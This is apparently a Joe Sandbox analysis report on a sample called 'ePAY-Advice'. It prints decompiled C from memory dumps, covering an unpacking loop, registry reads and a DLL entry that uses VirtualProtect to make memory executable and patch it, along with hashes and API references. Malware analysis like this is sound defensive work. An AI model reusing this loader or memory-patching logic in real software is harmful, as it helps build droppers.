											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00000000
0x004068ff
0x004068ff
0x00406903
0x0040692c
0x00406936
0x00406905
0x0040690e
0x0040691b
0x0040691e
0x00406c62
0x00406c62
0x00406c65
0x00406c65
0x00406c65
0x00406c6b
0x00406c71
0x00406c77
0x00406c91
0x00406c94
0x00406c9a
0x00406ca5
0x00406ca7
0x00406c79
0x00406c79
0x00406c88
0x00406c8c
0x00406c8c
0x00406cb1
0x00000000
0x00000000
0x00406cb3
0x00406cb7
0x00406e66
0x00406e7c
0x00406e84
0x00406e8b
0x00406e8d
0x00406e94
0x00406e98
0x00406e98
0x00406cc3
0x00406cca
0x00406cd2
0x00406cd5
0x00406cd8
0x00406cd8
0x00406cde
0x00406cde
0x0040647a
0x0040647a
0x0040647a
0x00406483
0x00000000
0x00000000
0x00406489
0x00000000
0x00406494
0x00000000
0x00000000
0x0040649d
0x004064a0
0x004064a3
0x004064a7
0x00000000
0x00000000
0x004064ad
0x004064b0
0x004064b2
0x004064b3
0x004064b6
0x004064b8
0x004064b9
0x004064bb
0x004064be
0x004064c3
0x004064c8
0x004064d1
0x004064e4
0x004064e7
0x004064f3
0x0040651b
0x0040651d
0x0040652b
0x0040652b
0x0040652f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040651f
0x0040651f
0x00406522
0x00406523
0x00406523
0x00000000
0x0040651f
0x004064f9
0x004064fe
0x004064fe
0x00406507
0x0040650f
0x00406512
0x00000000
0x00406518
0x00406518
0x00000000
0x00406518
0x00000000
0x00406535
0x00406535
0x00406539
0x00406de5
0x00000000
0x00406de5
0x00406542
0x00406552
0x00406555
0x00406558
0x00406558
0x00406558
0x0040655b
0x0040655f
0x00000000
0x00000000
0x00406561
0x00406567
0x00406591
0x00406597
0x0040659e
0x00000000
0x0040659e
0x0040656d
0x00406570
0x00406575
0x00406575
0x00406580
0x00406588
0x0040658b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004065d0
0x004065d6
0x004065d9
0x004065e6
0x004065ee
0x00406c62
0x00000000
0x00000000
0x004065a5
0x004065a5
0x004065a9
0x00406df4
0x00000000
0x00406df4
0x004065b5
0x004065c0
0x004065c0
0x004065c0
0x004065c3
0x004065c6
0x004065c9
0x004065ce
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c65
0x00406c65
0x00406c6b
0x00406c71
0x00406c77
0x00406c91
0x00406c94
0x00406c9a
0x00406ca5
0x00406ca7
0x00406c79
0x00406c79
0x00406c88
0x00406c8c
0x00406c8c
0x00406cb1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004065f6
0x004065f8
0x004065fb
0x0040666c
0x0040666f
0x00406672
0x00406679
0x00406683
0x00406c62
0x00406c62
0x00000000
0x00406c62
0x00406c62
0x004065fd
0x00406601
0x00406604
0x00406606
0x00406609
0x0040660c
0x0040660e
0x00406611
0x00406613
0x00406618
0x0040661b
0x0040661e
0x00406622
0x00406629
0x0040662c
0x00406633
0x00406637
0x0040663f
0x0040663f
0x0040663f
0x00406639
0x00406639
0x00406639
0x0040662e
0x0040662e
0x0040662e
0x00406643
0x00406646
0x00406664
0x00406666
0x00000000
0x00406648
0x00406648
0x0040664b
0x0040664e
0x00406651
0x00406653
0x00406653
0x00406653
0x00406656
0x00406659
0x0040665b
0x0040665c
0x0040665f
0x00000000
0x0040665f
0x00000000
0x00406895
0x00406899
0x004068b7
0x004068ba
0x004068c1
0x004068c4
0x004068c7
0x004068ca
0x004068cd
0x004068d0
0x004068d2
0x004068d9
0x004068da
0x004068dc
0x004068df
0x004068e2
0x004068e5
0x004068e5
0x004068ea
0x00000000
0x004068ea
0x0040689b
0x0040689e
0x004068a1
0x004068ab
0x00406c62
0x00406c62
0x00000000
0x00406c62
0x00000000
0x00000000
0x00000000
0x00406942
0x00406946
0x00000000
0x00000000
0x0040694c
0x00406950
0x00000000
0x00000000
0x00406956
0x00406958
0x0040695c
0x0040695c
0x0040695f
0x00406963
0x00000000
0x00000000
0x004069b3
0x004069b7
0x004069be
0x004069c1
0x004069c4
0x004069ce
0x00406c62
0x00406c62
0x00000000
0x00406c62
0x00406c62
0x004069b9
0x00000000
0x00000000
0x004069da
0x004069de
0x004069e5
0x004069e8
0x004069eb
0x004069e0
0x004069e0
0x004069e0
0x004069ee
0x004069f1
0x004069f4
0x004069f4
0x004069f7
0x004069fa
0x004069fd
0x004069fd
0x00406a00
0x00406a07
0x00406a0c
0x00000000
0x00000000
0x00406a9a
0x00406a9a
0x00406a9e
0x00406e3c
0x00000000
0x00406e3c
0x00406aa4
0x00406aa7
0x00406aaa
0x00406aae
0x00406ab1
0x00406ab7
0x00406ab9
0x00406ab9
0x00406ab9
0x00406abc
0x00406abf
0x00000000
0x00000000
0x0040668f
0x0040668f
0x00406693
0x00406e00
0x00000000
0x00406e00
0x00406699
0x0040669c
0x0040669f
0x004066a3
0x004066a6
0x004066ac
0x004066ae
0x004066ae
0x004066ae
0x004066b1
0x004066b4
0x004066b4
0x004066b7
0x004066ba
0x00000000
0x00000000
0x004066c0
0x004066c6
0x00000000
0x00000000
0x004066cc
0x004066cc
0x004066d0
0x004066d3
0x004066d6
0x004066d9
0x004066dc
0x004066dd
0x004066e0
0x004066e2
0x004066e8
0x004066eb
0x004066ee
0x004066f1
0x004066f4
0x004066f7
0x004066fa
0x00406716
0x00406719
0x0040671c
0x0040671f
0x00406726
0x0040672a
0x0040672c
0x00406730
0x004066fc
0x004066fc
0x00406700
0x00406708
0x0040670d
0x0040670f
0x00406711
0x00406711
0x00406733
0x0040673a
0x0040673d
0x00000000
0x00406743
0x00000000
0x00406743
0x00000000
0x00406748
0x00406748
0x0040674c
0x00406e0c
0x00000000
0x00406e0c
0x00406752
0x00406755
0x00406758
0x0040675c
0x0040675f
0x00406765
0x00406767
0x00406767
0x00406767
0x0040676a
0x0040676d
0x0040676d
0x0040676d
0x00406773
0x00000000
0x00000000
0x00406775
0x00406778
0x0040677b
0x0040677e
0x00406781
0x00406784
0x00406787
0x0040678a
0x0040678d
0x00406790
0x00406793
0x004067ab
0x004067ae
0x004067b1
0x004067b4
0x004067b4
0x004067b7
0x004067bb
0x004067bd
0x00406795
0x00406795
0x0040679d
0x004067a2
0x004067a4
0x004067a6
0x004067a6
0x004067c0
0x004067c7
0x004067ca
0x00000000
0x004067cc
0x00000000
0x004067cc
0x004067ca
0x004067d1
0x004067d1
0x004067d1
0x004067d1
0x00000000
0x00000000
0x0040680c
0x0040680c
0x00406810
0x00406e18
0x00000000
0x00406e18
0x00406816
0x00406819
0x0040681c
0x00406820
0x00406823
0x00406829
0x0040682b
0x0040682b
0x0040682b
0x0040682e
0x00406831
0x00406831
0x00406837
0x004067d5
0x004067d5
0x004067d8
0x00000000
0x004067d8
0x00406839
0x00406839
0x0040683c
0x0040683f
0x00406842
0x00406845
0x00406848
0x0040684b
0x0040684e
0x00406851
0x00406854
0x00406857
0x0040686f
0x00406872
0x00406875
0x00406878
0x00406878
0x0040687b
0x0040687f
0x00406881
0x00406859
0x00406859
0x00406861
0x00406866
0x00406868
0x0040686a
0x0040686a
0x00406884
0x0040688b
0x0040688e
0x00000000
0x00406890
0x00000000
0x00406890
0x00000000
0x00406b1d
0x00406b1d
0x00406b21
0x00406e48
0x00000000
0x00406e48
0x00406b27
0x00406b2a
0x00406b2d
0x00406b31
0x00406b34
0x00406b3a
0x00406b3c
0x00406b3c
0x00406b3c
0x00406b3f
0x00000000
0x00000000
0x004068ed
0x004068ed
0x004068f0
0x00406c62
0x00406c62
0x00000000
0x00406c62
0x00000000
0x00406c2c
0x00406c30
0x00406c52
0x00406c55
0x00406c5f
0x00406c62
0x00406c62
0x00000000
0x00406c62
0x00406c62
0x00406c32
0x00406c35
0x00406c39
0x00406c3c
0x00406c3c
0x00406c3f
0x00000000
0x00000000
0x00406ce9
0x00406ced
0x00406d0b
0x00406d0b
0x00406d0b
0x00406d12
0x00406d19
0x00406d20
0x00406d20
0x00000000
0x00406d20
0x00406cef
0x00406cf2
0x00406cf5
0x00406cf8
0x00406cff
0x00406c43
0x00406c43
0x00406c46
0x00000000
0x00000000
0x00406dda
0x00406ddd
0x00406cde
0x00000000
0x00000000
0x00406a14
0x00406a16
0x00406a1d
0x00406a1e
0x00406a20
0x00406a23
0x00000000
0x00000000
0x00406a2b
0x00406a2e
0x00406a31
0x00406a33
0x00406a35
0x00406a35
0x00406a36
0x00406a39
0x00406a40
0x00406a43
0x00406a51
0x00000000
0x00000000
0x00406d27
0x00406d27
0x00406d2a
0x00406d31
0x00000000
0x00000000
0x00406d36
0x00406d36
0x00406d3a
0x00406e72
0x00000000
0x00406e72
0x00406d40
0x00406d43
0x00406d46
0x00406d4a
0x00406d4d
0x00406d53
0x00406d55
0x00406d55
0x00406d55
0x00406d58
0x00406d5b
0x00406d5b
0x00406d5b
0x00406d5b
0x00406d5e
0x00406d5e
0x00406d62
0x00406dc2
0x00406dc5
0x00406dca
0x00406dcb
0x00406dcd
0x00406dcf
0x00406dd2
0x00406cde
0x00406cde
0x00000000
0x00406ce4
0x00406cde
0x00406d64
0x00406d6a
0x00406d6d
0x00406d70
0x00406d73
0x00406d76
0x00406d79
0x00406d7c
0x00406d7f
0x00406d82
0x00406d85
0x00406d9e
0x00406da1
0x00406da4
0x00406da7
0x00406dab
0x00406dad
0x00406dad
0x00406dae
0x00406db1
0x00406d87
0x00406d87
0x00406d8f
0x00406d94
0x00406d96
0x00406d99
0x00406d99
0x00406db4
0x00406dbb
0x00000000
0x00406dbd
0x00000000
0x00406dbd
0x00000000
0x00406a59
0x00406a5c
0x00406a92
0x00406bc2
0x00406bc2
0x00406bc2
0x00406bc2
0x00406bc5
0x00406bc5
0x00406bc8
0x00406bca
0x00406e54
0x00000000
0x00406e54
0x00406bd0
0x00406bd3
0x00000000
0x00000000
0x00406bd9
0x00406bdd
0x00406be0
0x00406be0
0x00406be0
0x00000000
0x00406be0
0x00406a5e
0x00406a60
0x00406a62
0x00406a64
0x00406a67
0x00406a68
0x00406a6a
0x00406a6c
0x00406a6f
0x00406a72
0x00406a88
0x00406a8d
0x00406ac5
0x00406ac5
0x00406ac9
0x00406af5
0x00406af7
0x00406afe
0x00406b01
0x00406b04
0x00406b04
0x00406b09
0x00406b09
0x00406b0b
0x00406b0e
0x00406b15
0x00406b18
0x00406b45
0x00406b45
0x00406b48
0x00406b4b
0x00406bbf
0x00406bbf
0x00406bbf
0x00000000
0x00406bbf
0x00406b4d
0x00406b53
0x00406b56
0x00406b59
0x00406b5c
0x00406b5f
0x00406b62
0x00406b65
0x00406b68
0x00406b6b
0x00406b6e
0x00406b87
0x00406b89
0x00406b8c
0x00406b8d
0x00406b90
0x00406b92
0x00406b95
0x00406b97
0x00406b99
0x00406b9c
0x00406b9e
0x00406ba1
0x00406ba5
0x00406ba7
0x00406ba7
0x00406ba8
0x00406bab
0x00406bae
0x00406b70
0x00406b70
0x00406b78
0x00406b7d
0x00406b7f
0x00406b82
0x00406b82
0x00406bb1
0x00406bb8
0x00406b42
0x00406b42
0x00406b42
0x00406b42
0x00000000
0x00406bba
0x00000000
0x00406bba
0x00406bb8
0x00406acb
0x00406ace
0x00406ad0
0x00406ad3
0x00406ad6
0x00406ad9
0x00406adb
0x00406ade
0x00406ae1
0x00406ae1
0x00406ae4
0x00406ae4
0x00406ae7
0x00406aee
0x00406ac2
0x00406ac2
0x00406ac2
0x00406ac2
0x00000000
0x00406af0
0x00000000
0x00406af0
0x00406aee
0x00406a74
0x00406a77
0x00406a79
0x00406a7c
0x00000000
0x00000000
0x004067db
0x004067db
0x004067df
0x00406e24
0x00000000
0x00406e24
0x004067e5
0x004067e8
0x004067eb
0x004067ee
0x004067f1
0x004067f4
0x004067f7
0x004067f9
0x004067fc
0x004067ff
0x00406802
0x00406804
0x00406804
0x00406804
0x00000000
0x00000000
0x00406966
0x00406966
0x0040696a
0x00406e30
0x00000000
0x00406e30
0x00406970
0x00406973
0x00406976
0x00406979
0x0040697b
0x0040697b
0x0040697b
0x0040697e
0x00406981
0x00406984
0x00406987
0x0040698a
0x0040698d
0x0040698e
0x00406990
0x00406990
0x00406990
0x00406993
0x00406996
0x00406999
0x0040699c
0x0040699c
0x0040699c
0x0040699f
0x004069a1
0x004069a1
0x00000000
0x00000000
0x00406be3
0x00406be3
0x00406be3
0x00406be7
0x00000000
0x00000000
0x00406bed
0x00406bf0
0x00406bf3
0x00406bf6
0x00406bf8
0x00406bf8
0x00406bf8
0x00406bfb
0x00406bfe
0x00406c01
0x00406c04
0x00406c07
0x00406c0a
0x00406c0b
0x00406c0d
0x00406c0d
0x00406c0d
0x00406c10
0x00406c13
0x00406c16
0x00406c19
0x00406c1c
0x00406c20
0x00406c22
0x00406c25
0x00000000
0x00406c27
0x004069a4
0x004069a4
0x00000000
0x004069a4
0x00406c25
0x00406e5a
0x00000000
0x00000000
0x00406489
0x00406e91
0x00406e91
0x00000000
0x00406e91
0x00406cde
0x00406c65
0x00406c62

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 721cf2a7e84b7ceee3b40c5675287f3d3981b6f25cb9f163efdac731e148116f
Instruction ID: 5c7df32a9af3fd0bcd177ef93077855236352ac101eaea0ca8dc2b1de7da3dc3
Opcode Fuzzy Hash: 721cf2a7e84b7ceee3b40c5675287f3d3981b6f25cb9f163efdac731e148116f
Instruction Fuzzy Hash: B5715571D04229DBEF28CF98C844BADBBB1FF44305F15806AD842BB281C7389A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 004024E5 Relevance: 4.5, APIs: 3, Instructions: 47
registryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004024E5(int* __ebx, intOrPtr __edx, char* __esi) {
				int _t10;
				long _t13;
				int* _t16;
				intOrPtr _t21;
				void* _t22;
				char* _t24;
				void* _t26;
				void* _t29;

				_t24 = __esi;
				_t21 = __edx;
				_t16 = __ebx;
				_t22 = E00402B0B(_t29, 0x20019);
				_t10 = E00402AA9(3);
				 *((intOrPtr*)(_t26 - 0x3c)) = _t21;
				 *__esi = __ebx;
				if(_t22 == __ebx) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				} else {
					 *(_t26 + 8) = 0x3ff;
					if( *((intOrPtr*)(_t26 - 0x18)) == __ebx) {
						_t13 = RegEnumValueA(_t22, _t10, __esi, _t26 + 8, __ebx, __ebx, __ebx, __ebx);
						__eflags = _t13;
						if(_t13 != 0) {
							 *((intOrPtr*)(_t26 - 4)) = 1;
						}
					} else {
						RegEnumKeyA(_t22, _t10, __esi, 0x3ff);
					}
					_t24[0x3ff] = _t16;
					_push(_t22); // executed
					RegCloseKey(); // executed
				}
				 *0x4237a8 =  *0x4237a8 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}

0x004024e5
0x004024e5
0x004024e5
0x004024f1
0x004024f3
0x004024fb
0x004024fe
0x00402500
0x0040271c
0x00402506
0x0040250e
0x00402511
0x0040252a
0x00402530
0x00402532
0x00402534
0x00402534
0x00402513
0x00402517
0x00402517
0x0040253b
0x00402541
0x00402542
0x00402542
0x0040295a
0x00402966

APIs

RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402517
RegEnumValueA.ADVAPI32 ref: 0040252A
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nslD140.tmp,00000000,00000011,00000002), ref: 00402542

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: 6d7d240506e52f84ca63180f399979f23551ada1929ecf091a5a6c56d6f7a97f
Instruction ID: f9c9d4f8a48b0a97d8c79733a9fb854b34cc646312cc8a153312459baeab55ba
Opcode Fuzzy Hash: 6d7d240506e52f84ca63180f399979f23551ada1929ecf091a5a6c56d6f7a97f
Instruction Fuzzy Hash: B70171B1A04205BFEB159FA59D9CABF7ABCDF40348F10443EF105A61C0D6B85A41976A

Uniqueness

Uniqueness Score: -1.00%

Function 6E1628E5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x6e164038 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x6e16404c, 4, 0x40, 0x6e16403c); // executed
					 *0x6e16404c = 0xc2;
					 *0x6e16403c = 0;
					 *0x6e164044 = 0;
					 *0x6e164058 = 0;
					 *0x6e164048 = 0;
					 *0x6e164040 = 0;
					 *0x6e164050 = 0;
					 *0x6e16404e = 0;
				}
				return 1;
			}

0x6e1628ee
0x6e1628f3
0x6e162903
0x6e16290b
0x6e162912
0x6e162917
0x6e16291c
0x6e162921
0x6e162926
0x6e16292b
0x6e162930
0x6e162930
0x6e162938

APIs

VirtualProtect.KERNELBASE(6E16404C,00000004,00000040,6E16403C), ref: 6E162903

Strings

`ghv@Mhv, xrefs: 6E162903

Memory Dump Source

Source File: 00000000.00000002.839140691.000000006E161000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.839133432.000000006E160000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.839147920.000000006E163000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.839153984.000000006E165000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e160000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: ProtectVirtual
String ID: `ghv@Mhv
API String ID: 544645111-2667177705
Opcode ID: 0a2b25d74398a1d1ab8c30f69b8e51b6648be0ff9c82a391c75908fa423b1fbe
Instruction ID: af6cd859f4d672837fcd9b1e8580d03bc3c2407ea6a5184587da4845ce4086a0
Opcode Fuzzy Hash: 0a2b25d74398a1d1ab8c30f69b8e51b6648be0ff9c82a391c75908fa423b1fbe
Instruction Fuzzy Hash: 90F0ACB1519A71DECFD1CF6884647AE3FE0B35B354B11C52AE158D7241E334485ABB11

Uniqueness

Uniqueness Score: -1.00%

Function 00402473 Relevance: 3.1, APIs: 2, Instructions: 56
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402473(int* __ebx, char* __esi) {
				void* _t17;
				char* _t18;
				void* _t33;
				void* _t37;
				void* _t40;

				_t35 = __esi;
				_t27 = __ebx;
				_t17 = E00402B0B(_t40, 0x20019); // executed
				_t33 = _t17;
				_t18 = E00402ACB(0x33);
				 *__esi = __ebx;
				if(_t33 == __ebx) {
					 *(_t37 - 4) = 1;
				} else {
					 *(_t37 - 0x3c) = 0x400;
					if(RegQueryValueExA(_t33, _t18, __ebx, _t37 + 8, __esi, _t37 - 0x3c) != 0) {
						L7:
						 *_t35 = _t27;
						 *(_t37 - 4) = 1;
					} else {
						if( *(_t37 + 8) == 4) {
							__eflags =  *(_t37 - 0x18) - __ebx;
							 *(_t37 - 4) = 0 |  *(_t37 - 0x18) == __ebx;
							E00405EC8(__esi,  *__esi);
						} else {
							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
								 *(_t37 - 4) =  *(_t37 - 0x18);
								_t35[0x3ff] = _t27;
							} else {
								goto L7;
							}
						}
					}
					_push(_t33); // executed
					RegCloseKey(); // executed
				}
				 *0x4237a8 =  *0x4237a8 +  *(_t37 - 4);
				return 0;
			}

0x00402473
0x00402473
0x00402478
0x0040247f
0x00402481
0x00402488
0x0040248a
0x0040271c
0x00402490
0x00402493
0x004024ae
0x004024de
0x004024de
0x004024e0
0x004024b0
0x004024b4
0x004024cd
0x004024d4
0x004024d7
0x004024b6
0x004024b9
0x004024c4
0x0040253b
0x00000000
0x00000000
0x00000000
0x004024b9
0x004024b4
0x00402541
0x00402542
0x00402542
0x0040295a
0x00402966

APIs

RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024A3
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nslD140.tmp,00000000,00000011,00000002), ref: 00402542

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 914b1adca73828fdde0e6c3897d81d926bc1e1ae80d178eebf1ddd830bb570f1
Instruction ID: 797b5721f9f96c9af8eba6c362a28f779825b0d179cdb3fb2efbf2dc45e8c0c9
Opcode Fuzzy Hash: 914b1adca73828fdde0e6c3897d81d926bc1e1ae80d178eebf1ddd830bb570f1
Instruction Fuzzy Hash: 4F11C471A05205FEDB15CF64DA989AEBAB49F00348F20843FE545B62C0D2B84A81DB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x423750;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x422eec =  *0x422eec + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x422eec, 0x7530,  *0x422ed4), 0);
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3be8b2c82b9d5296ba031bde5fc3ac6967fc1ef6e00b1cb2986e69e81292ed92
Instruction ID: 2eeecbca978bd34a3a2c87f0a48c5f542c226d41099ae67583a71d3d142e8862
Opcode Fuzzy Hash: 3be8b2c82b9d5296ba031bde5fc3ac6967fc1ef6e00b1cb2986e69e81292ed92
